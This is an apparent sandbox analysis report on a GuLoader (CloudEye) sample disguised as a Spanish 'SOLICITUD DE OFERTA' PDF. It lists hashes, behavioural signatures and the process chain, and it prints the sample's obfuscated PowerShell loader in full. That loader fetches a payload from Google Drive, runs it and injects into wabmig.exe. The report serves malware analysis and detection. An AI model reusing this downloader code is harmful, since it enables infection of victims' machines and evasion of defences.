Analysis
-
max time kernel
149s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25/09/2024, 05:45
Static task
static1
Behavioral task
behavioral1
Sample
SOLICITUD DE OFERTA_CR894·pdf.vbe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
SOLICITUD DE OFERTA_CR894·pdf.vbe
Resource
win10v2004-20240802-en
General
-
Target
SOLICITUD DE OFERTA_CR894·pdf.vbe
-
Size
26KB
-
MD5
e11bbc8cee5056167a63bcef0fe84e4d
-
SHA1
3e918da8f1b5470bb595a6b0b547cbcd027f7092
-
SHA256
f104572d09f9f2cbec6f95cd5dbb676804216ce5ae3f35cff1582a35a4849238
-
SHA512
9c408ac208f0afcb9d9c2ed8a6f4087e7e72585757a2969905dd31c20481905d2cbfde067b43242100bc2b70c10e8d3fb1e400d0cf47281c9dd1eb1ce1f6d2fc
-
SSDEEP
384:3ydPCgpjudNX1kAfBmtAKNaZQZVNiBW3R:idPZp6dzkAf0t3ag/iBW3R
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 1876 powershell.exe 7 1876 powershell.exe -
pid Process 3004 powershell.exe 1876 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 5 drive.google.com 9 drive.google.com 4 drive.google.com -
pid Process 3004 powershell.exe 1876 powershell.exe 2640 cmd.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 2404 wabmig.exe 2404 wabmig.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3004 powershell.exe 2404 wabmig.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3004 set thread context of 2404 3004 powershell.exe 38 -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wabmig.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3004 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1876 powershell.exe 3004 powershell.exe 3004 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 3004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1876 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2404 wabmig.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 2132 wrote to memory of 1876 2132 WScript.exe 31 PID 2132 wrote to memory of 1876 2132 WScript.exe 31 PID 2132 wrote to memory of 1876 2132 WScript.exe 31 PID 1876 wrote to memory of 2056 1876 powershell.exe 33 PID 1876 wrote to memory of 2056 1876 powershell.exe 33 PID 1876 wrote to memory of 2056 1876 powershell.exe 33 PID 1876 wrote to memory of 2640 1876 powershell.exe 35 PID 1876 wrote to memory of 2640 1876 powershell.exe 35 PID 1876 wrote to memory of 2640 1876 powershell.exe 35 PID 2640 wrote to memory of 3004 2640 cmd.exe 36 PID 2640 wrote to memory of 3004 2640 cmd.exe 36 PID 2640 wrote to memory of 3004 2640 cmd.exe 36 PID 2640 wrote to memory of 3004 2640 cmd.exe 36 PID 3004 wrote to memory of 2652 3004 powershell.exe 37 PID 3004 wrote to memory of 2652 3004 powershell.exe 37 PID 3004 wrote to memory of 2652 3004 powershell.exe 37 PID 3004 wrote to memory of 2652 3004 powershell.exe 37 PID 3004 wrote to memory of 2404 3004 powershell.exe 38 PID 3004 wrote to memory of 2404 3004 powershell.exe 38 PID 3004 wrote to memory of 2404 3004 powershell.exe 38 PID 3004 wrote to memory of 2404 3004 powershell.exe 38 PID 3004 wrote to memory of 2404 3004 powershell.exe 38 PID 3004 wrote to memory of 2404 3004 powershell.exe 38
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE OFERTA_CR894·pdf.vbe"1⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Elleverens Anticeremonious Alpelandskaber Mowita Bevgelsesordre Hejdis #>;$Bilagsmaterialets='Majesttsfornrmelserne';<#Bardesanite Elselskab Uopretteligheds Pilotere Merriment #>;$Forbindelseslinien=$host.PrivateData;If ($Forbindelseslinien) {$Kvatorialguineaners++;}function Mekong($Memorbcr){$Decerned=$Memorbcr.Length-$Kvatorialguineaners;for( $Eklipses=5;$Eklipses -lt $Decerned;$Eklipses+=6){$Korridorers+=$Memorbcr[$Eklipses];}$Korridorers;}function Chesteine($Stoors){ . ($Uskrevet) ($Stoors);}$Blddels=Mekong 'mackiM Antio ple z Esbji Equilbobinlheroia P.lt/Strej5Yahus.Endev0Swin .alva(UnkinWBogsaiL cinnThickdOccasoDechowDi.apsFener PilloNAutogTAflir Puf e1Duali0Engli.Calor0 orts;De,ai BackpWHydroicrib.n N ns6 Str 4gravi; mdes Rib,nx .rec6Schol4Data ; Unco AssigrP fabvEnfac: Bego1P stm2Indis1Slbe..Bigge0 Un,e)Lsbla BagvgGS mlkeUnconc DebikAnmelo Eque/Cur,e2Overd0Centr1 our0Lapsa0Po.ce1Virk,0Bogme1 Neur .utotF HalviF,tnirLabi egenfofDampaoalitzxLaund/ .ast1 Afb 2Lej.i1 Sini. Unh.0Maori ';$Xanth=Mekong 'Li.teU BlaaSRetouEJanusr Acet-ButleaFunktgStr wEReconngrn.etlacet ';$Appelsintrer=Mekong ' Skaeh Sam tskalat F igpSpionsUlogi: Fagm/ Op e/Avi,idRadi,rBayadiNettovPunc.eGamop. KonggMucinoNedtooSmrbogMotiolBlotte Tipo.SgemucSnaggo Sy hmCit z/AlyteuMuntjcUnrec? ,vereSkov ximperpCarr.oKaramrSku etUddel=Und rd unguoprogrwTownfnPo selApollo R,ceaJasm dSyn.r&RapndiAntendAfsta=Gesch1AfgifJBiobeGLibert ,ecel chil2InkassT dsfv C powJo.navLivenRPreveLfor asSp doEKobenCg nbrwKlod.- SmedX Prof8DentiQFanbaA dlaaaRalliI Syn O Pri IOsteodStu,ePTru dm GallPDichrKFo iunU.oru-Fisk BCo to ';$Fossilification=Mekong 'welsh>Bloka ';$Uskrevet=Mekong 'ChloriBlokpE NonpX Unre ';$trafikmngden='Thirstiest';$Offentliggr = Mekong 'TyrefeYrkercNedfohFje.doContr Sbre,%Form,acorusp nalopSamhad lvinaSol st LlinaGavne%Repip\Co,roALu ripska,deWorkfrAn idtOhma uAnglorPythoeEnigmd Frav.RdklvUAckn.nDelmnuNanki Ingvo&Bi,rf&Tornb C,efeDucescBri.eh Pen o Blas Talk,tKnytt ';Chesteine (Mekong 'Grave$Pucelg RacklTilbioAu iobblndlaPhraslSmgen: sediNHeadsaMilitv.netynTo.uaeCo tiaSvi,egDelnotulighiTimelg ,omp=B ais( Dr.zc aramKrebadSocia Noemi/In ercDimid Simi$RehamOM ffefRaaprfFa,fleSygehn UncrtDumbblAmatri horrg.allagByr.er Over) Flle ');Chesteine (Mekong 'Taisd$Nonstg elhelantieounsmobSe usa nderlO dsk:PlanoSSuitao Mennr V.asb Da,oeUnsextGensaeFlersrGeody=Spige$ nkeAA bilpAnkylpGest eAericlFall.sHajosiTelefnBerggtassevrKampjeMatzor Spot.Nerves Pla,pPentalF lleiDommetHj.mm(Uncri$lokkeFS ovloP pirsNem tsForetiRatlalLommei BundfLaseriFredsc Serpa Bal tFritii ituaoSekunn Impo)Kabal ');Chesteine (Mekong 'Bolig[Robe NFjerneAssortTjens.S rinSHandee PeccrMellevTrteriHj rtcPleiaeBrobaPPapndo SpediB rthn HypntOmposMUngenaScia nEffa aAfn tgKajleeInterrDefau],iske: ndho:trrehSBellaeUnju.cArvebuMave rThor,iAffrtt Kirky H ggP,orbirBegu oPr metBilaso Agrac yceto Skatl,yrrh Forva= ,ril Ordr [KokotN Undee Cleat Fors.dishoSCadgee De,ucUbestu EquirSylt,i,rogitSalgsyHolocPNoninrPa hyo ReadtDelpho Tyv.cHoffooPok llModstTShotlynovelp appueMod a]Kel f:Srtb : BremT BagvlRegiosPolyu1 Disp2Glans ');$Appelsintrer=$Sorbeter[0];$Projektbeskrivelser= (Mekong 'Aa,ni$an ibGBhutal BeigO Sonab PighA icroLUbes.:DebatTFor ur VrdiALejersberejsVersiedistrRReskne AntiRNatur=CastrnLikvieSuborwGhass-Malleo tolzbStikpjDragoE perfCSn deTA,arc Ve,ds SporyHalvas RundTArbejE.oethmJu,yw.,onpun SphieCoventLysst. B.rgWSnohaESpadsbAfsbeCGgl nl eriiSlut.EEry.hNMand t');$Projektbeskrivelser+=$Navneagtig[1];Chesteine ($Projektbeskrivelser);Chesteine (Mekong 'Spo.v$ Ste TChackrSolska UltisSociasFrille .oncrFaldneTurisrDyspi.BronzHUn xeeFortra.lupndFlorme teamrArch.s.prem[Aurae$CharmXObstraHept nInflatdramahF rud]Gonoc= Rend$SobriBJaloulTerradCh nndSeduceSki slVrdips Diph ');$Strumstrum=Mekong 'Irith$souffTFrdigrHodagaPyja.sBebias oreeBaksnr orfaeRunrorBruge.UnderDmi.ieoUer.awconstnFor ultrstoo onomaNatardLys oF DechiSer nltweageClois(Drfl.$SvabrAFastipBe.rapEmporeA,kanl OmdesSub cii nicnCou ttlavnirBalleeStormrP,sta, kams$Re.ilOMillir Submireevae SplanLagentRidabe K ssrHomode V lbnHugged St,eeBlind)begre ';$Orienterende=$Navneagtig[0];Chesteine (Mekong 'Beer $GarpiGOrendln.kkeoUnderbSydfra FladLSuper: ju eUJomfrNGnaven Unc.A GenbtBesttUsy teRRetiaaWirliL Sp iIsanktSPyohet Nonsi Far.C Synf=Uncov( M anTForbeEXenacsIndskTPluto-N nbopStum aForhatMagnuhLogic haarr$SoritooppebRSandbiS eipEDa.phnInte,tSysteeKvar rPresee MastnMusicdsalt.ERend )Gene ');while (!$Unnaturalistic) {Chesteine (Mekong 'Blu,t$Oks hgCuraslCatbroPljenbKonstaFlavol chry:Voc.mRAhornyU bandLithonLokkeiSkinknPaaregklbehs Breg= oost$Cata,tTomatrCallau Selvepa.te ') ;Chesteine $Strumstrum;Chesteine (Mekong 'B tleSExedrt UdbyaElsierCarditKysha-AcetoSmiljbl eboeegu zleSortbpProje Nonce4Gled. ');Chesteine (Mekong ' Cali$ .eengP.efelImbeloOmfa b RlinaFe.rylCykel:,kjolUS lvhn Emblnsamf a Limntsha.nuGtebarfi,suaConjelSucc,iCon es LofttlustriSsonecmegat=Prepr(HeredT .ilgeSc ewsVoidetIndis-HusdyPSubsiaIndistA gomhTvegg Klren$ AdorOFortrrUnderiBestyeBl,nkn AmfitUnchreFrr,srGenopeFy ennSee adwa ereceleo)Formu ') ;Chesteine (Mekong 'Udgif$KeepbgArrasl Steeo Wit.b pru,a eksel Biog:ZeuglS Faktl demoaskiedv Un eeTumortMechaiBo ofl Hy rv Ar hrSrtr.eGtepal KontsMaxi eImplirFremtn askoeSjoflsSub e= uizz$Rece gruskrlSirb osubstbSistea WomalFoul,:SororPDermaaTriklrIntuiaMasocuPteronThioitBevgee ekspr Omst4Crawf3 Luta+Tilgr+Af,vk%Campa$fami.S PinxoFrdigr edbjb Awole VerdtMet deDissirSkrll.Abor cIndgroQuintuDigitnS.ccht Skrd ') ;$Appelsintrer=$Sorbeter[$Slavetilvrelsernes];}$Tankebanerne=312475;$Myopically=29784;Chesteine (Mekong 'Akkor$Finm g bu glCountoBusteb YaffaViderlTiffi:T,oraTS nitrS,rvio F rsmVa drbTeo,uoPandocGrae.yDataut recet Shake Un.arPreex2 Tid.1 Re.r ems=Metoa aero GCounte KonttBa de-SeborCRheosoForhanBatlotS cioetrkninAntists dde Fora$ RdhtO SubirAlkvaiFlewseFor rnparadtSalice irkerRe isesmr rnSmagedForl,eValou ');Chesteine (Mekong 'Hv lf$FremdgJournlnonlioHariob dslaaDe ialUnsan:FerryH Me liAminop Udvip hromoBrit.tErythoKuttem Cy.eiPummecAkkreaElkholsa le Landb=ber i Raspb[LithoSGrillyAstensTjr.st,leiseEndorm Prod.KofteCMyggeoGonian.robovDelume K.ogrVandft Waff]Sprut:Erhol:halvfF BerrrFord,oMatzomPdagoB estta Dasys.vatoe Flag6 Conf4 MullSKommetSimmerNachuiRuddlnShelbgStrif(U ity$fryseTclabbrA beso lyngmSt esbCaco oExinecAngekyTilprtGravetNrs ne.amalrV.ndl2Bul,e1 yper)Combl ');Chesteine (Mekong 'Tyend$Sc pog PlowlMilieoWingbbFraflaGuitalSalg :LunteUExag nLsengi StranFanossKo,mitRens r,odbauStikbmUndere Re nn tjetPlatyaSkriflArbejlH droyancha Bel e= efro Talje[CigarSn miny aagesPasitt C.lieMountmAchar. NoveTSat ne Statx Sil tImagi.centrEtelefnB inkc llenoExtemd S.amiAiramnvulvogbib.s]Trner: tact: ni rAGardnSBaffiCBlik.I Me aITilvr. UngeGparaleMi,estU cubSDkspltSi,gar moriiOufounSh ddg ukas(Beskf$Cu.hiHAdvokilogi.p VelvpFo paoForsitUdtryoTung,m Ohi i Rot c C oca nvirl Aftv)Vanvi ');Chesteine (Mekong 'Ramsh$Scri.grawi lMelleoNitr bFavrpaUngenlIrbit: VidnTFlyabr oufyForstgRatiolDelageG inerSv,nkiN nlyeUholdr KladnIn orePeriosKlatm= ergp$AsparUFravan SubdiDuellnAtte sSupint idderPistouH andmOxa ae.nbumnTi sktAfv saSuperlMontilTelegy kldt. Du esSuboruU valbforkmsTotaltUnderrBo stiManurnFrig gQuint( Bul $Bo toTAnfrtaContanTrapekTrinveBalstbTweedanringnSolbae strer.laninRotereAdven, Civi$krigsMHerr yNigh o Tekopisoz,iSmirkcPro,ea Idehl DisslTr.lvySalon)Remem ');Chesteine $Trygleriernes;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1876 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Apertured.Unu && echo t"3⤵PID:2056
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Elleverens Anticeremonious Alpelandskaber Mowita Bevgelsesordre Hejdis #>;$Bilagsmaterialets='Majesttsfornrmelserne';<#Bardesanite Elselskab Uopretteligheds Pilotere Merriment #>;$Forbindelseslinien=$host.PrivateData;If ($Forbindelseslinien) {$Kvatorialguineaners++;}function Mekong($Memorbcr){$Decerned=$Memorbcr.Length-$Kvatorialguineaners;for( $Eklipses=5;$Eklipses -lt $Decerned;$Eklipses+=6){$Korridorers+=$Memorbcr[$Eklipses];}$Korridorers;}function Chesteine($Stoors){ . ($Uskrevet) ($Stoors);}$Blddels=Mekong 'mackiM Antio ple z Esbji Equilbobinlheroia P.lt/Strej5Yahus.Endev0Swin .alva(UnkinWBogsaiL cinnThickdOccasoDechowDi.apsFener PilloNAutogTAflir Puf e1Duali0Engli.Calor0 orts;De,ai BackpWHydroicrib.n N ns6 Str 4gravi; mdes Rib,nx .rec6Schol4Data ; Unco AssigrP fabvEnfac: Bego1P stm2Indis1Slbe..Bigge0 Un,e)Lsbla BagvgGS mlkeUnconc DebikAnmelo Eque/Cur,e2Overd0Centr1 our0Lapsa0Po.ce1Virk,0Bogme1 Neur .utotF HalviF,tnirLabi egenfofDampaoalitzxLaund/ .ast1 Afb 2Lej.i1 Sini. Unh.0Maori ';$Xanth=Mekong 'Li.teU BlaaSRetouEJanusr Acet-ButleaFunktgStr wEReconngrn.etlacet ';$Appelsintrer=Mekong ' Skaeh Sam tskalat F igpSpionsUlogi: Fagm/ Op e/Avi,idRadi,rBayadiNettovPunc.eGamop. KonggMucinoNedtooSmrbogMotiolBlotte Tipo.SgemucSnaggo Sy hmCit z/AlyteuMuntjcUnrec? ,vereSkov ximperpCarr.oKaramrSku etUddel=Und rd unguoprogrwTownfnPo selApollo R,ceaJasm dSyn.r&RapndiAntendAfsta=Gesch1AfgifJBiobeGLibert ,ecel chil2InkassT dsfv C powJo.navLivenRPreveLfor asSp doEKobenCg nbrwKlod.- SmedX Prof8DentiQFanbaA dlaaaRalliI Syn O Pri IOsteodStu,ePTru dm GallPDichrKFo iunU.oru-Fisk BCo to ';$Fossilification=Mekong 'welsh>Bloka ';$Uskrevet=Mekong 'ChloriBlokpE NonpX Unre ';$trafikmngden='Thirstiest';$Offentliggr = Mekong 'TyrefeYrkercNedfohFje.doContr Sbre,%Form,acorusp nalopSamhad lvinaSol st LlinaGavne%Repip\Co,roALu ripska,deWorkfrAn idtOhma uAnglorPythoeEnigmd Frav.RdklvUAckn.nDelmnuNanki Ingvo&Bi,rf&Tornb C,efeDucescBri.eh Pen o Blas Talk,tKnytt ';Chesteine (Mekong 'Grave$Pucelg RacklTilbioAu iobblndlaPhraslSmgen: sediNHeadsaMilitv.netynTo.uaeCo tiaSvi,egDelnotulighiTimelg ,omp=B ais( Dr.zc aramKrebadSocia Noemi/In ercDimid Simi$RehamOM ffefRaaprfFa,fleSygehn UncrtDumbblAmatri horrg.allagByr.er Over) Flle ');Chesteine (Mekong 'Taisd$Nonstg elhelantieounsmobSe usa nderlO dsk:PlanoSSuitao Mennr V.asb Da,oeUnsextGensaeFlersrGeody=Spige$ nkeAA bilpAnkylpGest eAericlFall.sHajosiTelefnBerggtassevrKampjeMatzor Spot.Nerves Pla,pPentalF lleiDommetHj.mm(Uncri$lokkeFS ovloP pirsNem tsForetiRatlalLommei BundfLaseriFredsc Serpa Bal tFritii ituaoSekunn Impo)Kabal ');Chesteine (Mekong 'Bolig[Robe NFjerneAssortTjens.S rinSHandee PeccrMellevTrteriHj rtcPleiaeBrobaPPapndo SpediB rthn HypntOmposMUngenaScia nEffa aAfn tgKajleeInterrDefau],iske: ndho:trrehSBellaeUnju.cArvebuMave rThor,iAffrtt Kirky H ggP,orbirBegu oPr metBilaso Agrac yceto Skatl,yrrh Forva= ,ril Ordr [KokotN Undee Cleat Fors.dishoSCadgee De,ucUbestu EquirSylt,i,rogitSalgsyHolocPNoninrPa hyo ReadtDelpho Tyv.cHoffooPok llModstTShotlynovelp appueMod a]Kel f:Srtb : BremT BagvlRegiosPolyu1 Disp2Glans ');$Appelsintrer=$Sorbeter[0];$Projektbeskrivelser= (Mekong 'Aa,ni$an ibGBhutal BeigO Sonab PighA icroLUbes.:DebatTFor ur VrdiALejersberejsVersiedistrRReskne AntiRNatur=CastrnLikvieSuborwGhass-Malleo tolzbStikpjDragoE perfCSn deTA,arc Ve,ds SporyHalvas RundTArbejE.oethmJu,yw.,onpun SphieCoventLysst. B.rgWSnohaESpadsbAfsbeCGgl nl eriiSlut.EEry.hNMand t');$Projektbeskrivelser+=$Navneagtig[1];Chesteine ($Projektbeskrivelser);Chesteine (Mekong 'Spo.v$ Ste TChackrSolska UltisSociasFrille .oncrFaldneTurisrDyspi.BronzHUn xeeFortra.lupndFlorme teamrArch.s.prem[Aurae$CharmXObstraHept nInflatdramahF rud]Gonoc= Rend$SobriBJaloulTerradCh nndSeduceSki slVrdips Diph ');$Strumstrum=Mekong 'Irith$souffTFrdigrHodagaPyja.sBebias oreeBaksnr orfaeRunrorBruge.UnderDmi.ieoUer.awconstnFor ultrstoo onomaNatardLys oF DechiSer nltweageClois(Drfl.$SvabrAFastipBe.rapEmporeA,kanl OmdesSub cii nicnCou ttlavnirBalleeStormrP,sta, kams$Re.ilOMillir Submireevae SplanLagentRidabe K ssrHomode V lbnHugged St,eeBlind)begre ';$Orienterende=$Navneagtig[0];Chesteine (Mekong 'Beer $GarpiGOrendln.kkeoUnderbSydfra FladLSuper: ju eUJomfrNGnaven Unc.A GenbtBesttUsy teRRetiaaWirliL Sp iIsanktSPyohet Nonsi Far.C Synf=Uncov( M anTForbeEXenacsIndskTPluto-N nbopStum aForhatMagnuhLogic haarr$SoritooppebRSandbiS eipEDa.phnInte,tSysteeKvar rPresee MastnMusicdsalt.ERend )Gene ');while (!$Unnaturalistic) {Chesteine (Mekong 'Blu,t$Oks hgCuraslCatbroPljenbKonstaFlavol chry:Voc.mRAhornyU bandLithonLokkeiSkinknPaaregklbehs Breg= oost$Cata,tTomatrCallau Selvepa.te ') ;Chesteine $Strumstrum;Chesteine (Mekong 'B tleSExedrt UdbyaElsierCarditKysha-AcetoSmiljbl eboeegu zleSortbpProje Nonce4Gled. ');Chesteine (Mekong ' Cali$ .eengP.efelImbeloOmfa b RlinaFe.rylCykel:,kjolUS lvhn Emblnsamf a Limntsha.nuGtebarfi,suaConjelSucc,iCon es LofttlustriSsonecmegat=Prepr(HeredT .ilgeSc ewsVoidetIndis-HusdyPSubsiaIndistA gomhTvegg Klren$ AdorOFortrrUnderiBestyeBl,nkn AmfitUnchreFrr,srGenopeFy ennSee adwa ereceleo)Formu ') ;Chesteine (Mekong 'Udgif$KeepbgArrasl Steeo Wit.b pru,a eksel Biog:ZeuglS Faktl demoaskiedv Un eeTumortMechaiBo ofl Hy rv Ar hrSrtr.eGtepal KontsMaxi eImplirFremtn askoeSjoflsSub e= uizz$Rece gruskrlSirb osubstbSistea WomalFoul,:SororPDermaaTriklrIntuiaMasocuPteronThioitBevgee ekspr Omst4Crawf3 Luta+Tilgr+Af,vk%Campa$fami.S PinxoFrdigr edbjb Awole VerdtMet deDissirSkrll.Abor cIndgroQuintuDigitnS.ccht Skrd ') ;$Appelsintrer=$Sorbeter[$Slavetilvrelsernes];}$Tankebanerne=312475;$Myopically=29784;Chesteine (Mekong 'Akkor$Finm g bu glCountoBusteb YaffaViderlTiffi:T,oraTS nitrS,rvio F rsmVa drbTeo,uoPandocGrae.yDataut recet Shake Un.arPreex2 Tid.1 Re.r ems=Metoa aero GCounte KonttBa de-SeborCRheosoForhanBatlotS cioetrkninAntists dde Fora$ RdhtO SubirAlkvaiFlewseFor rnparadtSalice irkerRe isesmr rnSmagedForl,eValou ');Chesteine (Mekong 'Hv lf$FremdgJournlnonlioHariob dslaaDe ialUnsan:FerryH Me liAminop Udvip hromoBrit.tErythoKuttem Cy.eiPummecAkkreaElkholsa le Landb=ber i Raspb[LithoSGrillyAstensTjr.st,leiseEndorm Prod.KofteCMyggeoGonian.robovDelume K.ogrVandft Waff]Sprut:Erhol:halvfF BerrrFord,oMatzomPdagoB estta Dasys.vatoe Flag6 Conf4 MullSKommetSimmerNachuiRuddlnShelbgStrif(U ity$fryseTclabbrA beso lyngmSt esbCaco oExinecAngekyTilprtGravetNrs ne.amalrV.ndl2Bul,e1 yper)Combl ');Chesteine (Mekong 'Tyend$Sc pog PlowlMilieoWingbbFraflaGuitalSalg :LunteUExag nLsengi StranFanossKo,mitRens r,odbauStikbmUndere Re nn tjetPlatyaSkriflArbejlH droyancha Bel e= efro Talje[CigarSn miny aagesPasitt C.lieMountmAchar. NoveTSat ne Statx Sil tImagi.centrEtelefnB inkc llenoExtemd S.amiAiramnvulvogbib.s]Trner: tact: ni rAGardnSBaffiCBlik.I Me aITilvr. UngeGparaleMi,estU cubSDkspltSi,gar moriiOufounSh ddg ukas(Beskf$Cu.hiHAdvokilogi.p VelvpFo paoForsitUdtryoTung,m Ohi i Rot c C oca nvirl Aftv)Vanvi ');Chesteine (Mekong 'Ramsh$Scri.grawi lMelleoNitr bFavrpaUngenlIrbit: VidnTFlyabr oufyForstgRatiolDelageG inerSv,nkiN nlyeUholdr KladnIn orePeriosKlatm= ergp$AsparUFravan SubdiDuellnAtte sSupint idderPistouH andmOxa ae.nbumnTi sktAfv saSuperlMontilTelegy kldt. Du esSuboruU valbforkmsTotaltUnderrBo stiManurnFrig gQuint( Bul $Bo toTAnfrtaContanTrapekTrinveBalstbTweedanringnSolbae strer.laninRotereAdven, Civi$krigsMHerr yNigh o Tekopisoz,iSmirkcPro,ea Idehl DisslTr.lvySalon)Remem ');Chesteine $Trygleriernes;"3⤵
- Network Service Discovery
- Suspicious use of WriteProcessMemory
PID:2640 -
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Elleverens Anticeremonious Alpelandskaber Mowita Bevgelsesordre Hejdis #>;$Bilagsmaterialets='Majesttsfornrmelserne';<#Bardesanite Elselskab Uopretteligheds Pilotere Merriment #>;$Forbindelseslinien=$host.PrivateData;If ($Forbindelseslinien) {$Kvatorialguineaners++;}function Mekong($Memorbcr){$Decerned=$Memorbcr.Length-$Kvatorialguineaners;for( $Eklipses=5;$Eklipses -lt $Decerned;$Eklipses+=6){$Korridorers+=$Memorbcr[$Eklipses];}$Korridorers;}function Chesteine($Stoors){ . ($Uskrevet) ($Stoors);}$Blddels=Mekong 'mackiM Antio ple z Esbji Equilbobinlheroia P.lt/Strej5Yahus.Endev0Swin .alva(UnkinWBogsaiL cinnThickdOccasoDechowDi.apsFener PilloNAutogTAflir Puf e1Duali0Engli.Calor0 orts;De,ai BackpWHydroicrib.n N ns6 Str 4gravi; mdes Rib,nx .rec6Schol4Data ; Unco AssigrP fabvEnfac: Bego1P stm2Indis1Slbe..Bigge0 Un,e)Lsbla BagvgGS mlkeUnconc DebikAnmelo Eque/Cur,e2Overd0Centr1 our0Lapsa0Po.ce1Virk,0Bogme1 Neur .utotF HalviF,tnirLabi egenfofDampaoalitzxLaund/ .ast1 Afb 2Lej.i1 Sini. Unh.0Maori ';$Xanth=Mekong 'Li.teU BlaaSRetouEJanusr Acet-ButleaFunktgStr wEReconngrn.etlacet ';$Appelsintrer=Mekong ' Skaeh Sam tskalat F igpSpionsUlogi: Fagm/ Op e/Avi,idRadi,rBayadiNettovPunc.eGamop. KonggMucinoNedtooSmrbogMotiolBlotte Tipo.SgemucSnaggo Sy hmCit z/AlyteuMuntjcUnrec? ,vereSkov ximperpCarr.oKaramrSku etUddel=Und rd unguoprogrwTownfnPo selApollo R,ceaJasm dSyn.r&RapndiAntendAfsta=Gesch1AfgifJBiobeGLibert ,ecel chil2InkassT dsfv C powJo.navLivenRPreveLfor asSp doEKobenCg nbrwKlod.- SmedX Prof8DentiQFanbaA dlaaaRalliI Syn O Pri IOsteodStu,ePTru dm GallPDichrKFo iunU.oru-Fisk BCo to ';$Fossilification=Mekong 'welsh>Bloka ';$Uskrevet=Mekong 'ChloriBlokpE NonpX Unre ';$trafikmngden='Thirstiest';$Offentliggr = Mekong 'TyrefeYrkercNedfohFje.doContr Sbre,%Form,acorusp nalopSamhad lvinaSol st LlinaGavne%Repip\Co,roALu ripska,deWorkfrAn idtOhma uAnglorPythoeEnigmd Frav.RdklvUAckn.nDelmnuNanki Ingvo&Bi,rf&Tornb C,efeDucescBri.eh Pen o Blas Talk,tKnytt ';Chesteine (Mekong 'Grave$Pucelg RacklTilbioAu iobblndlaPhraslSmgen: sediNHeadsaMilitv.netynTo.uaeCo tiaSvi,egDelnotulighiTimelg ,omp=B ais( Dr.zc aramKrebadSocia Noemi/In ercDimid Simi$RehamOM ffefRaaprfFa,fleSygehn UncrtDumbblAmatri horrg.allagByr.er Over) Flle ');Chesteine (Mekong 'Taisd$Nonstg elhelantieounsmobSe usa nderlO dsk:PlanoSSuitao Mennr V.asb Da,oeUnsextGensaeFlersrGeody=Spige$ nkeAA bilpAnkylpGest eAericlFall.sHajosiTelefnBerggtassevrKampjeMatzor Spot.Nerves Pla,pPentalF lleiDommetHj.mm(Uncri$lokkeFS ovloP pirsNem tsForetiRatlalLommei BundfLaseriFredsc Serpa Bal tFritii ituaoSekunn Impo)Kabal ');Chesteine (Mekong 'Bolig[Robe NFjerneAssortTjens.S rinSHandee PeccrMellevTrteriHj rtcPleiaeBrobaPPapndo SpediB rthn HypntOmposMUngenaScia nEffa aAfn tgKajleeInterrDefau],iske: ndho:trrehSBellaeUnju.cArvebuMave rThor,iAffrtt Kirky H ggP,orbirBegu oPr metBilaso Agrac yceto Skatl,yrrh Forva= ,ril Ordr [KokotN Undee Cleat Fors.dishoSCadgee De,ucUbestu EquirSylt,i,rogitSalgsyHolocPNoninrPa hyo ReadtDelpho Tyv.cHoffooPok llModstTShotlynovelp appueMod a]Kel f:Srtb : BremT BagvlRegiosPolyu1 Disp2Glans ');$Appelsintrer=$Sorbeter[0];$Projektbeskrivelser= (Mekong 'Aa,ni$an ibGBhutal BeigO Sonab PighA icroLUbes.:DebatTFor ur VrdiALejersberejsVersiedistrRReskne AntiRNatur=CastrnLikvieSuborwGhass-Malleo tolzbStikpjDragoE perfCSn deTA,arc Ve,ds SporyHalvas RundTArbejE.oethmJu,yw.,onpun SphieCoventLysst. B.rgWSnohaESpadsbAfsbeCGgl nl eriiSlut.EEry.hNMand t');$Projektbeskrivelser+=$Navneagtig[1];Chesteine ($Projektbeskrivelser);Chesteine (Mekong 'Spo.v$ Ste TChackrSolska UltisSociasFrille .oncrFaldneTurisrDyspi.BronzHUn xeeFortra.lupndFlorme teamrArch.s.prem[Aurae$CharmXObstraHept nInflatdramahF rud]Gonoc= Rend$SobriBJaloulTerradCh nndSeduceSki slVrdips Diph ');$Strumstrum=Mekong 'Irith$souffTFrdigrHodagaPyja.sBebias oreeBaksnr 